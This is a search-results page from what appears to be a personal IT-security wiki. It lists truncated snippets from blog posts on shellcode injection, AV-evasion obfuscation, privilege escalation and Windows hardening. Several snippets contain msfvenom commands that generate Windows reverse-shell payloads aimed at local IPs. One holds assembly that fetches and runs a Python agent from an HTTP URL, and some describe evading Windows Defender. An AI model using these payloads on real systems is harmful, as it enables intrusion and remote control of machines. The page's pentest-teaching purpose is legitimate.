Suche
Unten sind die Ergebnisse Ihrer Suche gelistet.
Passende Seitennamen:
Volltextergebnisse:
- FatCat Attack PoC @en:it-security:blog
- | Privilege Escalation((https://github.com/frizb/Windows-Privilege-Escalation)) | AlwaysInstallElevated ((https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#alwaysinstallelevated)) | | @#58D3F7:**Actions on Objectives*... rate payload <code dos>msfvenom -a x86 –platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.
- Obfuscation: Disguise shellcode as UUIDs @en:it-security:blog
- {{tag>IT-Security Windows Kali pentest obfuscation blog english}} ====== Obfuscation: Disguise shellcode a... hat I used for testing was immediately blocked by Windows Defender. I therefore had to adapt the loader and... yption or encoding. This is usually recognised by Windows Defender. <code bash> python shencode.py create -c="-p windows/x64/shell/reverse_tcp LHOST=IPADDRESS LPORT=PORT
- Privilege escalation: Windows admin thanks to Linux @en:it-security:blog
- {{tag>it-security windows linux blog english}} ====== Privilege escalation: Windows admin thanks to Linux ====== In this tutorial, ... ll show you how to secure administrator rights on Windows PCs using a live boot CD. We will simulate two sc... ystem. \\ \\ ===== Initial situation ===== On a Windows system, the users ''users'' and ''sysadmin'' are
- SMB Hardening
- {{tag>english startpage it-security windows active-directory}} ====== SMB Hardening ====== ===== Technical... ights required) as follows: <code powershell>Get-WindowsOptionalFeature -Online -FeatureName SMB1Protocol<... ell (restart required): <code powershell>Disable-WindowsOptionalFeature -Online -FeatureName SMB1Protocol<... und here: <code> Computerkonfiguration -> Windows-Einstellungen -> Sicherheitseinstellungen
- Shellcode Injection Part 2 @en:it-security:blog
- {{tag>it-security windows kali pentest blog english}} ====== Shellcode Injection Part 2 ====== {{it-securi... . This form of injection is usually recognised by Windows Defender, so we will again use some obfuscation m... r. The output is binary: <code bash> msfvenom -p windows/x64/shell_reverse_tcp LHOST=172.28.126.97 LPORT=4... ub.com/fritzone/obfy )) was an immediate success. Windows Defender could no longer recognise the compiled f
- Shellcode Injection Part 1 @en:it-security:blog
- {{tag>it-security windows kali pentest blog english}} ====== Shellcode Injection Part 1 ====== In this ser... ve to the file shell.c | <code bash> msfvenom -p windows/shell_reverse_tcp LHOST=172.23.61.130 LPORT=445 -... ocess-injection.cpp> #include <stdio.h> #include <Windows.h> //shell.c unsigned const char payload[] = "\... shellcode in raw format: <code bash> msfvenom -p windows/shell_reverse_tcp LHOST=172.23.61.130 LPORT=445 -
- Group Managed Service Accounts
- {{tag>english startpage it-security windows active-directory}} ====== Group Managed Service Accounts ======... from Microsoft on this: > As of the October 2018 Windows 10 update, RSAT is included as a collection of features on demand in Windows 10 itself. Instead of downloading an RSAT package... es page. <sup>[[https://learn.microsoft.com/de-de/windows-server/remote/remote-server-administration-tools]
- Shellcode Injection Part 3 @en:it-security:blog
- {{tag>IT-Security Windows Kali pentest blog english}} ====== Shellcode Injection Part 3 ====== {{it-securi... ile 143 / +7 marks the beginning of the filename (WindowsAgent.py) lea edx, [esi + 7] ;Zeile 184 / command line to execute db "python WindowsAgent.py", 0 ;Zeile 192 / our URL db "http://172... e === We have to create the shellcode as ''%%x86 Windows%%'' binary file. We do this with ''%%nasm%%'': <
- Shellcode Injection Part 4 @en:it-security:blog
- {{tag>IT-Security Windows Kali pentest blog english}} ====== Shellcode Injection Part 4 ====== {{it-securi... ts should be met: * Start of ''calc.exe'' on a Windows computer * 64-bit code * Avoid null bytes ==... e address ==== Each time a process is started in Windows, modules are loaded into this process. One of these modules is our ''kernel32.dll''. Windows creates data structures in the working memory tha
- Obfuscation: polymorphic in-memory decoder @en:it-security:blog
- {{tag>IT-Security Windows Kali pentest obfuscation blog english}} ====== Obfuscation: polymorphic in-memor... pile it. <code cpp> #include <stdio.h> #include <windows.h> #include <iostream> #pragma warning unsigned ... on tests. During my test, even the Metasploit payload was not detected by Windows Defender. ~~DISCUSSION~~
- IT Security Cheat Sheets
- ecurity bypass bins | [[ghio>gtfobins ]] | ^::: | Windows security bypass bins | [[ghio>lolbas-project ]] |... ed | [[gh>aleff-github/my-flipper-shits/tree/main/Windows/Execution/Install_And_Run_Any_Arbitrary_Executabl
- Secure passwords
- password for each site * Follow the basic [[en:windows:security:basics|Windows security tips]] * Never share passwords ===== 6.0 Multifactor authentication =
- 64-Bit Stack CheatSheet
- ed as follows ((https://learn.microsoft.com/de-de/windows-hardware/drivers/debugger/x64-architecture)) ((ht
- The importance of awareness in IT security @en:it-security:blog
- file that was sent as an attachment in an email. Windows integrated it and the malware was able to spread.